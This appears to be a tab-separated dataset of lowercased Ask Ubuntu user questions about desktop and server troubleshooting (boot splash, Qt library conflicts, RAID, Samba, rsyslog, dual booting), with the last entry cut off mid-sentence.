370428	plymouth doesnt work correctly	when i boot my pc boot normaly exept for that the ubuntu logo isnt showing up , with its dots below it . reinstaling plymouth does not work . grub contains `` quiet splash ''
370430	assigning an interface button or shortcut to sleep.sh in xmonad	i 'm into xmonad for a second day . i 'm doing well so far . got it installed on ubuntu 12.4 from here , configured keyboard layouts , tweaked xmobar configs and etc . for screen lock i 'll use slock , and from my research , for power management ( entering sleep on a desktop ) i bet the best thing is to use /etc/acpi/sleep.sh directly . so my question is , how can i call sleep.sh in a more fashionable way , without entering terminal and typing sudo /etc/acpi/sleep.sh ? maybe a shortcut ? or an interface button ? also , solution should take into consideration sudo part , it would be nice to make my computer sleep without entering password . thank you very much !
370434	can not mix incompatible qt library ( version 0x40804 ) with this library ( version 0x40801 ) aborted core dumped	... can not mix incompatible qt library ( version 0x40804 ) with this library ( version 0x40801 ) aborted core dumped the problem occurs with 64-bit ubuntu 13.04 when starting k3b , ebook-viewer ... , gnome-classic ( no effects ) . sometimes the border of all open windows and terminals disappear and i have to reboot . i did n't find out which libraries are conflicting ... kind regards justus gadient xxx @ yyy : ~/desktop $ echo $ ld_library_path /usr/lib : /usr/local/lib : :/opt/amdapp/lib/x86_64 : /opt/intel/opencl/lib64 : /opt/intel/opencl/libmic open ( `` x86_64/libqtxml.so.4 '' , o_rdonly|o_cloexec ) = -1 enoent ( no such file or directory ) read ( 3 , can not mix incompatible qt library ( version 0x40804 ) with this library ( version 0x40801 ) stat ( `` /usr/local/digiaqtcommercialsdk/desktop/481/gcc-64/plugins '' , 0x7fff8cf68e80 ) = -1 enoent ( no such file or directory ) ldd linux-vdso.so.1 = > ( 0x00007fffa83fe000 ) libk3bdevice.so.6 = > /usr/lib/libk3bdevice.so.6 ( 0x00007f30ea2ac000 ) libk3blib.so.6 = > /usr/lib/libk3blib.so.6 ( 0x00007f30e9efb000 ) libkcddb.so.4 = > /usr/lib/libkcddb.so.4 ( 0x00007f30e9c9a000 ) libkfile.so.4 = > /usr/lib/libkfile.so.4 ( 0x00007f30e99f5000 ) libkio.so.5 = > /usr/lib/libkio.so.5 ( 0x00007f30e9558000 ) libknotifyconfig.so.4 = > /usr/lib/libknotifyconfig.so.4 ( 0x00007f30e9345000 ) libkde3support.so.4 = > /usr/lib/libkde3support.so.4 ( 0x00007f30e9050000 ) libsolid.so.4 = > /usr/lib/libsolid.so.4 ( 0x00007f30e8d64000 ) libqtwebkit.so.4 = > /usr/lib/x86_64-linux-gnu/libqtwebkit.so.4 ( 0x00007f30e6a16000 ) libkcmutils.so.4 = > /usr/lib/libkcmutils.so.4 ( 0x00007f30e67d8000 ) libqt3support.so.4 = > /usr/lib/x86_64-linux-gnu/libqt3support.so.4 ( 0x00007f30e6306000 ) libqtxml.so.4 = > /usr/lib/x86_64-linux-gnu/libqtxml.so.4 ( 0x00007f30e60c3000 ) libkdeui.so.5 = > /usr/lib/libkdeui.so.5 ( 0x00007f30e5a7f000 ) libkdecore.so.5 = > /usr/lib/libkdecore.so.5 ( 0x00007f30e55bf000 ) libqtcore.so.4 = > /opt/intel/opencl/lib64/libqtcore.so.4 ( 0x00007f30e50ca000 ) libqtdbus.so.4 = > /usr/lib/x86_64-linux-gnu/libqtdbus.so.4 ( 0x00007f30e4e4f000 ) libqtgui.so.4 = > /opt/intel/opencl/lib64/libqtgui.so.4 ( 0x00007f30e40e7000 ) libstdc++.so.6 = > /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( 0x00007f30e3de3000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f30e3a1a000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f30e3715000 ) libsamplerate.so.0 = > /usr/lib/x86_64-linux-gnu/libsamplerate.so.0 ( 0x00007f30e33a8000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f30e31a4000 ) libdvdread.so.4 = > /usr/lib/x86_64-linux-gnu/libdvdread.so.4 ( 0x00007f30e2f87000 ) libmusicbrainz5.so.0 = > /usr/lib/x86_64-linux-gnu/libmusicbrainz5.so.0 ( 0x00007f30e2cfe000 ) libqtnetwork.so.4 = > /usr/lib/x86_64-linux-gnu/libqtnetwork.so.4 ( 0x00007f30e29bf000 ) libgcc_s.so.1 = > /lib/x86_64-linux-gnu/libgcc_s.so.1 ( 0x00007f30e27a9000 ) libxrender.so.1 = > /usr/lib/x86_64-linux-gnu/libxrender.so.1 ( 0x00007f30e259e000 ) libnepomuk.so.4 = > /usr/lib/libnepomuk.so.4 ( 0x00007f30e22ce000 ) libqtsvg.so.4 = > /usr/lib/x86_64-linux-gnu/libqtsvg.so.4 ( 0x00007f30e2078000 ) libx11.so.6 = > /usr/lib/x86_64-linux-gnu/libx11.so.6 ( 0x00007f30e1d3d000 ) libstreamanalyzer.so.0 = > /usr/lib/libstreamanalyzer.so.0 ( 0x00007f30e1ac5000 ) libacl.so.1 = > /lib/x86_64-linux-gnu/libacl.so.1 ( 0x00007f30e18bd000 ) libattr.so.1 = > /lib/x86_64-linux-gnu/libattr.so.1 ( 0x00007f30e16b7000 ) libphonon.so.4 = > /usr/lib/x86_64-linux-gnu/libphonon.so.4 ( 0x00007f30e1449000 ) libkparts.so.4 = > /usr/lib/libkparts.so.4 ( 0x00007f30e11f5000 ) libkpty.so.4 = > /usr/lib/libkpty.so.4 ( 0x00007f30e0feb000 ) libudev.so.1 = > /lib/x86_64-linux-gnu/libudev.so.1 ( 0x00007f30e0dda000 ) libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007f30e0bc2000 ) libjpeg.so.8 = > /usr/lib/x86_64-linux-gnu/libjpeg.so.8 ( 0x00007f30e0971000 ) libpng12.so.0 = > /lib/x86_64-linux-gnu/libpng12.so.0 ( 0x00007f30e074b000 ) libxslt.so.1 = > /usr/lib/x86_64-linux-gnu/libxslt.so.1 ( 0x00007f30e050e000 ) libgstapp-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstapp-0.10.so.0 ( 0x00007f30e0302000 ) libgstinterfaces-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstinterfaces-0.10.so.0 ( 0x00007f30e00f0000 ) libgstpbutils-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstpbutils-0.10.so.0 ( 0x00007f30dfecb000 ) libgstvideo-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstvideo-0.10.so.0 ( 0x00007f30dfcaf000 ) libgstbase-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstbase-0.10.so.0 ( 0x00007f30dfa5b000 ) libgstreamer-0.10.so.0 = > /usr/lib/x86_64-linux-gnu/libgstreamer-0.10.so.0 ( 0x00007f30df774000 ) libgobject-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 ( 0x00007f30df525000 ) libxml2.so.2 = > /usr/lib/x86_64-linux-gnu/libxml2.so.2 ( 0x00007f30df1c2000 ) libglib-2.0.so.0 = > /lib/x86_64-linux-gnu/libglib-2.0.so.0 ( 0x00007f30deec5000 ) libsqlite3.so.0 = > /usr/lib/x86_64-linux-gnu/libsqlite3.so.0 ( 0x00007f30dec19000 ) libfontconfig.so.1 = > /usr/lib/x86_64-linux-gnu/libfontconfig.so.1 ( 0x00007f30de9df000 ) libqtopengl.so.4 = > /usr/lib/x86_64-linux-gnu/libqtopengl.so.4 ( 0x00007f30de6e0000 ) libgl.so.1 = > /usr/lib/libgl.so.1 ( 0x00007f30de501000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f30de2e4000 ) libqtsql.so.4 = > /usr/lib/x86_64-linux-gnu/libqtsql.so.4 ( 0x00007f30de0a4000 ) libsm.so.6 = > /usr/lib/x86_64-linux-gnu/libsm.so.6 ( 0x00007f30dde9c000 ) libice.so.6 = > /usr/lib/x86_64-linux-gnu/libice.so.6 ( 0x00007f30ddc7f000 ) libattica.so.0.4 = > /usr/lib/x86_64-linux-gnu/libattica.so.0.4 ( 0x00007f30dd9c7000 ) libdbusmenu-qt.so.2 = > /usr/lib/x86_64-linux-gnu/libdbusmenu-qt.so.2 ( 0x00007f30dd794000 ) libxfixes.so.3 = > /usr/lib/x86_64-linux-gnu/libxfixes.so.3 ( 0x00007f30dd58d000 ) libbz2.so.1.0 = > /lib/x86_64-linux-gnu/libbz2.so.1.0 ( 0x00007f30dd37d000 ) liblzma.so.5 = > /lib/x86_64-linux-gnu/liblzma.so.5 ( 0x00007f30dd15b000 ) libdlrestrictions.so.1 = > /usr/lib/libdlrestrictions.so.1 ( 0x00007f30dcf56000 ) libgthread-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgthread-2.0.so.0 ( 0x00007f30dcd54000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f30dcb4c000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f30ea4e3000 ) libdbus-1.so.3 = > /lib/x86_64-linux-gnu/libdbus-1.so.3 ( 0x00007f30dc907000 ) libfreetype.so.6 = > /usr/lib/x86_64-linux-gnu/libfreetype.so.6 ( 0x00007f30dc66a000 ) libxext.so.6 = > /usr/lib/x86_64-linux-gnu/libxext.so.6 ( 0x00007f30dc457000 ) libneon-gnutls.so.27 = > /usr/lib/libneon-gnutls.so.27 ( 0x00007f30dc230000 ) libsoprano.so.4 = > /usr/lib/libsoprano.so.4 ( 0x00007f30dbf49000 ) libsopranoclient.so.1 = > /usr/lib/libsopranoclient.so.1 ( 0x00007f30dbcfb000 ) libxcb.so.1 = > /usr/lib/x86_64-linux-gnu/libxcb.so.1 ( 0x00007f30dbadd000 ) libstreams.so.0 = > /usr/lib/libstreams.so.0 ( 0x00007f30db8a6000 ) libpulse.so.0 = > /usr/lib/x86_64-linux-gnu/libpulse.so.0 ( 0x00007f30db65e000 ) libpulse-mainloop-glib.so.0 = > /usr/lib/x86_64-linux-gnu/libpulse-mainloop-glib.so.0 ( 0x00007f30db459000 ) libnepomukutils.so.4 = > /usr/lib/libnepomukutils.so.4 ( 0x00007f30db21f000 ) libutil.so.1 = > /lib/x86_64-linux-gnu/libutil.so.1 ( 0x00007f30db01c000 ) libutempter.so.0 = > /usr/lib/libutempter.so.0 ( 0x00007f30dae19000 ) liborc-0.4.so.0 = > /usr/lib/x86_64-linux-gnu/liborc-0.4.so.0 ( 0x00007f30dab9a000 ) libgmodule-2.0.so.0 = > /usr/lib/x86_64-linux-gnu/libgmodule-2.0.so.0 ( 0x00007f30da996000 ) libffi.so.6 = > /usr/lib/x86_64-linux-gnu/libffi.so.6 ( 0x00007f30da78d000 ) libpcre.so.3 = > /lib/x86_64-linux-gnu/libpcre.so.3 ( 0x00007f30da54e000 ) libexpat.so.1 = > /lib/x86_64-linux-gnu/libexpat.so.1 ( 0x00007f30da325000 ) libatiuki.so.1 = > /usr/lib/libatiuki.so.1 ( 0x00007f30da207000 ) libuuid.so.1 = > /lib/x86_64-linux-gnu/libuuid.so.1 ( 0x00007f30da002000 ) libgnutls.so.26 = > /usr/lib/x86_64-linux-gnu/libgnutls.so.26 ( 0x00007f30d9d45000 ) libgssapi_krb5.so.2 = > /usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2 ( 0x00007f30d9b07000 ) libxau.so.6 = > /usr/lib/x86_64-linux-gnu/libxau.so.6 ( 0x00007f30d9902000 ) libxdmcp.so.6 = > /usr/lib/x86_64-linux-gnu/libxdmcp.so.6 ( 0x00007f30d96fc000 ) libjson.so.0 = > /lib/x86_64-linux-gnu/libjson.so.0 ( 0x00007f30d94f3000 ) libpulsecommon-3.0.so = > /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-3.0.so ( 0x00007f30d928f000 ) libnepomukquery.so.4 = > /usr/lib/libnepomukquery.so.4 ( 0x00007f30d9049000 ) libgcrypt.so.11 = > /lib/x86_64-linux-gnu/libgcrypt.so.11 ( 0x00007f30d8dca000 ) libtasn1.so.3 = > /usr/lib/x86_64-linux-gnu/libtasn1.so.3 ( 0x00007f30d8bb9000 ) libp11-kit.so.0 = > /usr/lib/x86_64-linux-gnu/libp11-kit.so.0 ( 0x00007f30d89a5000 ) libkrb5.so.3 = > /usr/lib/x86_64-linux-gnu/libkrb5.so.3 ( 0x00007f30d86d6000 ) libk5crypto.so.3 = > /usr/lib/x86_64-linux-gnu/libk5crypto.so.3 ( 0x00007f30d84ad000 ) libcom_err.so.2 = > /lib/x86_64-linux-gnu/libcom_err.so.2 ( 0x00007f30d82a9000 ) libkrb5support.so.0 = > /usr/lib/x86_64-linux-gnu/libkrb5support.so.0 ( 0x00007f30d80a0000 ) libwrap.so.0 = > /lib/x86_64-linux-gnu/libwrap.so.0 ( 0x00007f30d7e96000 ) libsndfile.so.1 = > /usr/lib/x86_64-linux-gnu/libsndfile.so.1 ( 0x00007f30d7c30000 ) libasyncns.so.0 = > /usr/lib/x86_64-linux-gnu/libasyncns.so.0 ( 0x00007f30d7a29000 ) libgpg-error.so.0 = > /lib/x86_64-linux-gnu/libgpg-error.so.0 ( 0x00007f30d7825000 ) libkeyutils.so.1 = > /lib/x86_64-linux-gnu/libkeyutils.so.1 ( 0x00007f30d7620000 ) libresolv.so.2 = > /lib/x86_64-linux-gnu/libresolv.so.2 ( 0x00007f30d7406000 ) libnsl.so.1 = > /lib/x86_64-linux-gnu/libnsl.so.1 ( 0x00007f30d71ec000 ) libflac.so.8 = > /usr/lib/x86_64-linux-gnu/libflac.so.8 ( 0x00007f30d6f9f000 ) libvorbisenc.so.2 = > /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2 ( 0x00007f30d6ad0000 ) libvorbis.so.0 = > /usr/lib/x86_64-linux-gnu/libvorbis.so.0 ( 0x00007f30d68a3000 ) libogg.so.0 = > /usr/lib/x86_64-linux-gnu/libogg.so.0 ( 0x00007f30d669b000 )
370437	stock exchange application	please tell me any type of stock exchange application available into linux like some other os window 7 available software like odin diet
370438	how to dual boot my laptop with windows 7 having preloaded ubuntu 12.04 ?	basically i want to install windows 7 on a preloaded ubuntu 12.04 laptop . how can i dual boot it ? i want to keep my ubuntu safe and also want to roll back the changes after some months . i have tried booting win7 via flash drive but it did n't work . how do i do this ? please help !
370440	finger print reader not detected for lenovo thinkpad edge e531 in ubuntu 12.04	i have installed fingerprint-gui according to their webpage . the result of lsusb is : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 8087:07da intel corp . bus 001 device 004 : id 138a:0011 validity sensors , inc. vfs5011 fingerprint reader bus 001 device 005 : id 5986:0397 acer , inc so it seems my fingerprint device is validity sensors ... . then i ran ls -la /dev/bus/usb/001/004 which gave the output : crw-rw-r -- 1 root root 189 , 3 nov 3 12:38 /dev/bus/usb/001/004 so the permission seems correct ? but whenever i ran fingerprint-gui it says no device detected . please help . i have dual boot with windows 7 , there it works perfectly ...
370445	add my own command to the path	i got an executable file ( edit_envir ) in /home/pshizh/desktop/ directory . i updated /etc/environment file to make /home/pshizh/desktop included in path . then i ran command edit_envir in terminal , but it said `` dit_envir command not found . however , after i copied file edit_envir to /usr/bin/ and ran command edit_envir in terminal again , it worked . why ? i 'd really appreciate your help .
370446	task manager for ubuntu 12.04	is there any task manager for the ubuntu likewise windows task manager in the window.please suggest me the inbuilt and then the third party software.thanks in advacnce
370447	how on ubuntu 12.04 writeon cd and read from cd	i installed ubuntu 12.04.when i put the disk in the drive of my computer icon of disk appears on desktop when i click on icon i receive images of several files and i do n't know what to do with them . i expected appearance of commands sach as `` read '' or `` write '' . i do n't know how activate interaction with the disk . i am nonprofessional in computer science and programming . simple user . i would appreciate very much if somebody could explain in simple words how to activate interaction with cd and dvd in ubuntu 12.04 .
370452	mdadm raid 5 failed , 1 drive bad 1 good 2 working	sorry if the title was a little confusing but i wanted to show a little info . so i went to turn my pc on and ended up with the nice screen of having a failed array . /dev/sdb1 and /dev/sde1 are within the array and working fine . the drive /dev/sdc1 is marked as failed but when i last ran a scan it was good and is fine through windows , so i hope to use it to fix the array . /dev/sdd1 is the failed drive that i need to replace and rebuild from , but i ca n't create the raid array at all due to having 2 disks . is there a possible way to re-add /dev/sdc1 then replace the other drive without losing all my data ? i would like to add more information , but i 'm really not sure where i can go from in terms of the os . thank you for the replies , jason . edit : i tired to assemble the raid array but continue to cycle through /dev/sd [ b-c-e ] 1 is busy ... will i have to unmount the drives or wait until they are inactive ? sorry if that 's a silly question . : (
370462	heimdal error decrypt integrity check failed for checksum type	when i try to authentication with heimdal-kdc , i get this error in kdc log : ( enctype aes256-cts-hmac-sha1-96 ) error decrypt integrity check failed for checksum type hmac-sha1-96-aes256 , key type aes256-cts-hmac-sha1-96 and authentication failed ! ! ! but authentication with kinit is correct ! ! my kerb5.conf is [ logging ] default = file : /var/log/krb5libs.log kdc = file : /var/log/krb5kdc.log krb5 = file : /var/log/krb5.log [ libdefaults ] default_realm = auth.langhua clockskew = 300 [ realms ] auth.langhua = { kdc = auth.langhua } [ domain_realm ] .langhua = auth.langhua [ kdc ] and when add this line to krb5.conf ( in kdc tag ) require-preauth = no i get this error krb5_get_init_creds : client have no reply key
370463	prevent wine from loading user fonts	i 'm using photoshopcs6 on wine1.7 , and this crashes everytime after selecting typetool . i guess some user fonts ( ~/.fonts/* ) causes crash on wine . how can i prevent wine from loading user fonts ? or , is there a way to specify fonts folder to load ?
370464	problem with connection windows 7 - samba	i installed the ubuntu 12.04 server . for access to files i use samba 3.6.3 . i set up in samba of the user . i assigned to folders all rights for it , i set the password . i rebooted the server . when i open ubuntu server through windows , i see all shared folders . i try to enter in folder , write login and the password - a failure : '' windows ca n't access ... check the spelling of the name . otherwise , there might be a problem with your network . to try to identify and resolve network problems , click diagnose . '' i open sabma , and share any additional folder for this user in samba , after that try to enter - without problems . if i try the same in nautilus , i have access from windows to share folders as well . after that , in other folders for this user too problems are n't present . i reboot the server about ubuntu and the computer with windows again the same problem . in what there can be a problem ? what to look ? i tried to use nautilus , but after reboot all shared folders do not share
370466	precise pangolin base installation , media change requested , using dvd	very frustrating . i 've already burned 3 fresh dvds with a newly downloaded install iso . i 'm trying to install precise pangolin the server edition , 32-bit . 12.04.3 to be exact . first , each time i have created a dvd , i check the integrity and it fails . a few times the dvd would not boot . finally , on the third dvd , it booted , and i have been able to get to the step for base installation . i 've already tried slowing down the burn speed to get a good copy of the iso but even when i slowed down to 4x , the integrity check still failed . all that aside , as i 've said , i 've managed to get to the base installation step when all of a sudden , i see this message : please insert the disc labeled : 'ubuntu-server 12.04.3 lts precise pangolin - release i386 ( 20130820.2 ) ' in the drive '/media/cdrom/ ' and press enter . media change ok , so first i do n't understand the message . i already have a dvd that is supposedly entitled that in the dvd drive . why do i need to place a cd in the cdrom drive ? ? ? ? i 've searched posts and lots comes close to fixing this problem but nothing has worked . for example , i pressed `` left ctrl+f1 '' , got to the console , and then tried to edit a file named sources.list . well , does n't exist where people tell me to look : ( anyone know what is wrong , what i need to do ? i thought using ubuntu was supposed to be easy and i 've already spent hours just trying to get through an installation process .
370471	eclipse hides/blocks text near cursor	i am having ubuntu 13.04 64 bit and eclipse . when i try to click on the editor ( any editor , java or xml ) , eclipse blocks/hides the text near the cursor . let me explain with the pictures . below is the part of xml file i am trying to edit . when i click on the text entry key= '' json '' value= '' application/json '' , it blocks the letters nearby cursor , as shown in image below : in the above image , the cursor is between value and = , like value { cursor } = , but i am not able to see the cursor , and also not able to see some characters near the cursor . however when i try to click on different line , the previously blocked text becomes visible but the characters nearby new cursor position gets blocked , for example when i click near property name= '' mediatypes '' , exactly my cursor is like property name= '' me { cursor } diatypes '' , but what eclipse shows me is shown in below image . first i thought that it may be the problem with eclipse ( juno ) , so i removed the eclipse installation , and downloaded new eclipse ( kepler ) , but still the problem is not resolved .
370472	how to send syslog messages to multiple destinations with rsyslog	i am using rsyslogd 5.8.6 on ubuntu 12.04 lts . in `` /etc/rsyslog.d/50-default.conf '' , i added this line to send all messages to my syslogserver , which works without problems . * . * @ syslogserver01.mydomain.bla:514 now i need to send the same messages to a second server . i tried to add the same code and just changed the server name . but this wo n't work . i see this error message in the log . nov 3 14:39:04 172.20.1.108 rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 18963 '' x-info= '' http : //www.rsyslog.com '' ] start nov 3 14:39:04 172.20.1.108 rsyslogd : rsyslogd 's groupid changed to 103 nov 3 14:39:04 172.20.1.108 rsyslogd : rsyslogd 's userid changed to 101 nov 3 14:39:04 172.20.1.108 rsyslogd-3000 : unknown priority name `` mydomain.bla:514 '' [ try http : //www.rsyslog.com/e/3000 ] nov 3 14:39:04 172.20.1.108 rsyslogd : the last error occured in /etc/rsyslog.d/50-default.conf , line 9 : '' @ secondsyslogserver.mydomain.bla:514 '' nov 3 14:39:04 172.20.1.108 rsyslogd : warning : selector line without actions will be discarded can anyone point me into the right direction ? i did n't find anything on google or other forums .
370473	how do i manually edit network wifi connections ?	i 've been travelling quite a bit recently - as a result i 've been connecting to a whole load of wifi connections on my ubuntu laptop . i 'd like to clean out my list of wifi connections - especially some of the public hotspots . normally i 'd rather not connect to anything public and insecure . is there a text or config file i can edit which has the same content as the `` edit connections ... '' dialog ? this is the same option that we find at the bottom if the networking menu in the unity menu-bar . yes , i could go through dialog and manually remove all the obsolete questions - but this is ubuntu so there really ought to be a better way .
370475	dual boot windows 8 and ubuntu in ssd/hdd system	i have a recently bought a laptop with an ssd of 128gb ( 46 gb free space ) and a hdd of 1tb ( 350 gb free space ) . currently , i have installed windows 8 on the ssd ( c drive ) and i use the the hdd ( d drive ) to store my data ( images , music , videos , documents etc. ) . would it be possible for me to install ubuntu next to windows 8 on the ssd , giving it about 20 gb for system and then make a really small home folder on c and actually just use my files from my d drive ( the hdd ) and keep my data and would i still be able to access my data from windows 8 ? thank you in advance .
370476	ca n't access ubuntu ? ubuntu is not accepting my password . ca n't enter ubuntu even as guest session	all of a sudden , after one reboot , ubuntu is asking me to enter password to log in to my user profile . it was set to log in automatically , without entering password . and now it is asking for password and not accepting it , and i know it is correct . if i type some wrong password i am getting message `` incorrect password '' , but when i type correct one , it like starts with loading my profile , screen goes black like if drivers and settings are loading , but then just returns to same screen , asking to enter password . i can not login even choosing guest session ( also returns me back to login screen ) . ( do not have caps lock turned on , using same keyboard layout as always ) . using dual boot system - win xp and ubuntu 12.04 . i have tried to reset my password , but no success : - enter recovery mode ( root shell prompt ) - enter 'passwd ' ( i am single user ) - enter and reenter new password - getting message : `` passwd : autentication token manipulation error '' `` passwd : password unchanged '' what else can i try , or should i proceed to reinstalling ubuntu ? appreciate any help , advice , idea ... thanks
370477	cant change executable bit	i have written an c++ program , but cant run it because the executable bit is not on yes . so i wanted to change it , but it only changes it for a second and then swiches back .
370479	i want to remove ubuntu 13.10 from mt pc	i 'm trying to remove ubuntu , but i 'm not being able to do so , is there any way to do it , wubi does not work .
370481	vmware not updating	it says before you can run vmware , several modules must be compiled and loaded into the running kernel when i click install the box disappears and the vmware icon goes away , but it does n't do anything .
370482	mount another drive to the same directory	i recently purchased a server that was advertised as 2tb ( 2 1tb drives ) in size , when i use it it reports only one of the drives , i would like to be able to use both as if one drive . here is the specs ... sudo lshw -c disk *-disk description : ata disk product : toshiba dt01aca1 vendor : toshiba physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/sda version : ms2o serial : 13ej81xps size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=0005b3dd *-disk description : ata disk product : toshiba dt01aca1 vendor : toshiba physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdb version : ms2o serial : 13ox3tkps size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00030e86 and fdisk -l disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00030e86 device boot start end blocks id system /dev/sdb1 * 4096 41947135 20971520 fd linux raid autodetect /dev/sdb2 41947136 1952468991 955260928 fd linux raid autodetect /dev/sdb3 1952468992 1953519615 525312 82 linux swap / solaris disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0005b3dd device boot start end blocks id system /dev/sda1 * 4096 41947135 20971520 fd linux raid autodetect /dev/sda2 41947136 1952468991 955260928 fd linux raid autodetect /dev/sda3 1952468992 1953519615 525312 82 linux swap / solaris disk /dev/md2 : 978.2 gb , 978187124736 bytes 2 heads , 4 sectors/track , 238815216 cylinders , total 1910521728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/md2 does n't contain a valid partition table disk /dev/md1 : 21.5 gb , 21474770944 bytes 2 heads , 4 sectors/track , 5242864 cylinders , total 41942912 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/md1 does n't contain a valid partition table is it possible to mount both drives to say /home/ so i would have 2tb of usable space ?
370484	how can i stop my computer from automatically booting into ubuntu ?	i installed ubuntu 13.10 , and after rebooting my computer does not go into grub and just straight up boots into ubuntu . i am currently dual-booting windows 7 with ubuntu , so i would like to know how i can still access windows 7 .
370487	ca n't empty trash	i visited a lot of forums but found no answer . i have 5 files in my trash bin and i ca n't delete them , at first after i clicked on the empty trash button it would freeze , now when i do that it just says `` preparing '' and displays an error while trying to delete files . i tried deleting it via bleachbit but nothing , tried with terminal command sudo rm -rf ~/.trash/* it does n't work either . i found out that one of my folders is immutable , i tried to disable that via terminal it did n't work , i ca n't even restore it , it freezes again . i 've been using ubuntu 13.10 for few weeks and i am new to linux . how can i solve this ?
370489	ubuntu 13.10 64bit no working usb	well i installed ubuntu 13.10 fresh install and updated it ..etc one day i was downloading `` wine '' then i left my pc open and slept . i woke up and of course the lock screen was on `` the screen where it shows that you must type your password to continue '' then i noticed that my keyboard did n't type anything neither my mouse moved `` basically mouse + keyboard froze . i tried unplugging them and re-plugging them but it did n't work . i restarted the computer `` cold boot '' and then choose ubuntu again . but after the boot selection screen that let me choose from ubuntu and ubuntu recovery ..etc everything went well but i noticed that my mouse and keyboard stopped working ..etc all usb devices it 's not usb 3.0 it 's 2.0 . every usb device that is connected to my pc stop working after booting ubuntu . i tested the usb deviced it still work on another pc . and it works before ubuntu start . { it work in grub boot loader selection screen } i tried to choose ubuntu recovery mode but after booting recovery my keyboard ..etc does n't work . so how i can fix this ? i wo n't re install ubuntu this is my 3rd re installing it .
370494	transferring music ratings from rhythmbox to gmusicbrowser	context used rhythmbox on older ubuntu . switched to xubuntu 13.10 . default player is gmusicbrowser . rhythmbox still available . i have previously , on rhythmbox , patiently rated much of my music collection , which allows to let it play automatically enjoyable yet varied songs . as expected i 'd like to transfer ratings to gmusicbrowser . searching before asking rhythmbox stores ratings in xml format ~/.local/share/rhythmbox/rhythmdb.xml . seeing how the content of ~/.config/gmusicbrowser/gmbrc evolves with time shows that it contains all the data ( music collection , metadata , ratings ) . it looks tab-separated . has anyone made a script to transfer ratings from the former to the latter ? i could not find any . notice that transferring ratings and playlists from rhythmbox to clementine suggests exporting filtered playlists per rating and importing them to the new playser ( clementine in that case ) . this looks smart but makes assumptions about sending and receiving programs capabilities and tidyness . specific case the solution mentioned above might work with gmusicbrowser . i 'm just worried because my rhythmbox database is kind of `` dirty '' . it has several occurrences of many songs ( because is accessed them through different paths in its history and even lots of non-music files mentioned , making a 100mb rhythmdb.xml file , while the amount of actual music files mentioned in it is much much smaller than that ... ) . a script that walks gmusicbrowser database and writes a modified copy with cherry-picked ratings from rhythmbox database sounds better . questions has anyone done something similar ? any other hint ? regards ,
370498	how to disable automatic suspend warning	i 'm using ubuntu 13.10 as htpc . to save some power , i have set it to suspend after 30minutes of inactivity . before entering suspended state , a popup appears to warn me that computer is about to get put to sleep . this is a little annoyance since it appears when i resume the pc later . how can i disable this notification for good ?
370501	ubuntu sound lags in vmware workstation 10	i need help with vmware to stop sound lag . i have an hp 2000 series laptop pre-installed with windows 8 but upgraded it to the 8.1 pro preview , and the sound lags really bad . when the virtual machine plays a sound it lags , it 's more noticable on windows xp .
370505	how to use trackpoint but keep touchpad disabled on lenovo thinkpad e531	i have a lenovo thinkpad e531 laptop . this model has both a touchpad and a trackpoint . i 'd like to use the trackpoint , because i 'm used to it from my previous laptop , but i 'd also like to disable the touchpad , to prevent accidentally touching it . problem is , there are no dedicated trackpoint buttons on e531 . this is a picture of the e530 model : you can see it has a separate buttons above the touchpad which you can use when using the trackpoint . this is a picture of my model ( the e531 ) : as you can see , there are no buttons . there is just the touchpad . i can disable the touchpad ( in system settings - > mouse & touchpad ) and use the trackpoint to move the mouse pointer around , but then there is no way to click . as you can probably imagine , this is not very useful . what i 'm thinking is there should be a way to disable the mouse motion feature of the touchpad but still keep it clickable so i can use it as the mouse buttons for the trackpont . my question is , how to do it . i assume that it 